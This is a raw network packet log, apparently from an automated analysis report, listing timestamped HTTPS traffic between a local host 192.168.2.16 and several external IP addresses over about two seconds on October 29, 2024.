                                                                          Oct 29, 2024 16:50:48.702326059 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.702528000 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.702641964 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.702641964 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.702655077 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.702707052 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.702717066 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.703908920 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.703942060 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.703977108 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.704011917 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.704063892 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.704071999 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.704116106 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.704143047 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.819922924 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.820018053 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.820051908 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.820091963 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.820163012 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.820178986 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.820195913 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.820226908 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.820281029 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.820290089 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.820667982 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.820852041 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.820888042 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.820930004 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.820940018 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.820959091 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.864099026 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.864115000 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.905194998 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.936938047 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.937042952 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.937083960 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.937149048 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.937165976 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.937211037 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.937217951 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.937295914 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.937525034 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.940803051 CET49709443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.940818071 CET44349709104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.981462955 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.981499910 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:48.981688023 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.982954979 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:48.982966900 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.254889011 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.255259991 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.255275011 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.255945921 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.256283998 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.256438017 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.256516933 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.265862942 CET49713443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:49.265889883 CET44349713184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:49.265969992 CET49713443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:49.272258043 CET49713443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:49.272274971 CET44349713184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:49.303131104 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.460144043 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.460294008 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.460328102 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.460416079 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.460439920 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.460445881 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.460469007 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.460491896 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.460505962 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.460508108 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.460520029 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.460552931 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.460592985 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.510133028 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.510162115 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.558121920 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.584640026 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.584808111 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.584841013 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.584894896 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.584908009 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.584964037 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.585117102 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.585167885 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.585202932 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.585211039 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.585730076 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.585788965 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.585796118 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.594584942 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.594863892 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.594877958 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.598444939 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.598547935 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.598927975 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.599071026 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.599112034 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.638143063 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.638184071 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.654105902 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.654119015 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.686096907 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.702156067 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.709661007 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.709722996 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.709778070 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.709801912 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.709837914 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.709887981 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.709897995 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.710005045 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.710037947 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.710062027 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.710067987 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.710079908 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.710108995 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.740618944 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.740719080 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.740766048 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.740813017 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.740837097 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.740848064 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.740860939 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.740906954 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.740953922 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.741024017 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.741029978 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.741166115 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.741467953 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.746223927 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.746377945 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.746390104 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.752567053 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.752595901 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.752636909 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.752666950 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.752734900 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.797121048 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.838160038 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.838246107 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.838289022 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.838310957 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.838320971 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.838366985 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.838371992 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.838421106 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.838463068 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.838684082 CET49711443192.168.2.16104.18.94.41
                                                                          Oct 29, 2024 16:50:49.838695049 CET44349711104.18.94.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.855482101 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:49.855524063 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.855587959 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:49.857028961 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:49.857043982 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.858501911 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.858669043 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.858746052 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.858756065 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.858786106 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.858830929 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.858869076 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.859030008 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.859219074 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.859246016 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.859258890 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.859330893 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.859337091 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.874813080 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:49.874855042 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.874958992 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:49.875173092 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:49.875185966 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:49.877651930 CET49678443192.168.2.1620.189.173.10
                                                                          Oct 29, 2024 16:50:49.909110069 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.909126997 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.956136942 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.974975109 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.975092888 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.975146055 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.975239992 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.975258112 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.975332022 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.975668907 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.975759983 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.975836992 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.975843906 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.976459026 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.976511002 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.976521015 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.976527929 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:49.976567984 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:49.976572990 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:50.018110991 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:50.018120050 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:50.065113068 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:50.092124939 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:50.092236996 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:50.092286110 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:50.092289925 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:50.092310905 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:50.092349052 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:50.092356920 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:50.092411995 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:50.092554092 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:50.092660904 CET49712443192.168.2.16104.17.25.14
                                                                          Oct 29, 2024 16:50:50.092673063 CET44349712104.17.25.14192.168.2.16
                                                                          Oct 29, 2024 16:50:50.129334927 CET44349713184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:50.129492044 CET49713443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:50.133351088 CET49713443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:50.133359909 CET44349713184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:50.133800983 CET44349713184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:50.176104069 CET49713443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:50.180277109 CET49713443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:50.191123962 CET49678443192.168.2.1620.189.173.10
                                                                          Oct 29, 2024 16:50:50.227338076 CET44349713184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:50.433032990 CET44349713184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:50.433227062 CET44349713184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:50.433227062 CET49713443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:50.433227062 CET49713443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:50.433250904 CET44349713184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:50.433311939 CET49713443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:50.433324099 CET44349713184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:50.457216024 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.457506895 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.457528114 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.458559036 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.458625078 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.458913088 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.458971024 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.459043980 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.459050894 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.472956896 CET49717443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:50.472981930 CET44349717184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:50.473090887 CET49717443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:50.473345041 CET49717443192.168.2.16184.28.90.27
                                                                          Oct 29, 2024 16:50:50.473361015 CET44349717184.28.90.27192.168.2.16
                                                                          Oct 29, 2024 16:50:50.481113911 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.481373072 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.481381893 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.482417107 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.482481956 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.482763052 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.482830048 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.482894897 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.482903004 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.508073092 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.524104118 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.612504959 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.612590075 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.612622976 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.612660885 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.612679005 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.612713099 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.612757921 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.612765074 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.612801075 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.612814903 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.612880945 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.612912893 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.612926006 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.612931967 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.614098072 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.643603086 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.643729925 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.643764973 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.643802881 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.643815994 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.643834114 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.643852949 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.643872976 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.643914938 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.643929958 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.644701004 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.644757032 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.644776106 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.679131031 CET49718443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.679164886 CET44349718104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.679296017 CET49718443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.679466009 CET49718443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.679481983 CET44349718104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.699114084 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.728528023 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.728703976 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.728734970 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.728807926 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.728822947 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.728840113 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.728905916 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.728909969 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.728919029 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.728954077 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.729068995 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.729127884 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.729722023 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.760452986 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.760596991 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.760632992 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.760694981 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.760703087 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.760716915 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.760759115 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.760773897 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.760823965 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.760857105 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.761816978 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.761852026 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.761953115 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.761976004 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.761981964 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.761990070 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.762007952 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.762023926 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.762029886 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.762149096 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.762193918 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.762274981 CET49715443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.762286901 CET44349715104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.768043041 CET49719443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.768153906 CET44349719104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.768476963 CET49719443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.768476963 CET49719443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.768522978 CET44349719104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.778103113 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.778131962 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.793143034 CET49678443192.168.2.1620.189.173.10
                                                                          Oct 29, 2024 16:50:50.825093031 CET49714443192.168.2.16104.18.95.41
                                                                          Oct 29, 2024 16:50:50.844651937 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.844710112 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.844736099 CET44349714104.18.95.41192.168.2.16
                                                                          Oct 29, 2024 16:50:50.844795942 CET49714443192.168.2.16104.18.95.41
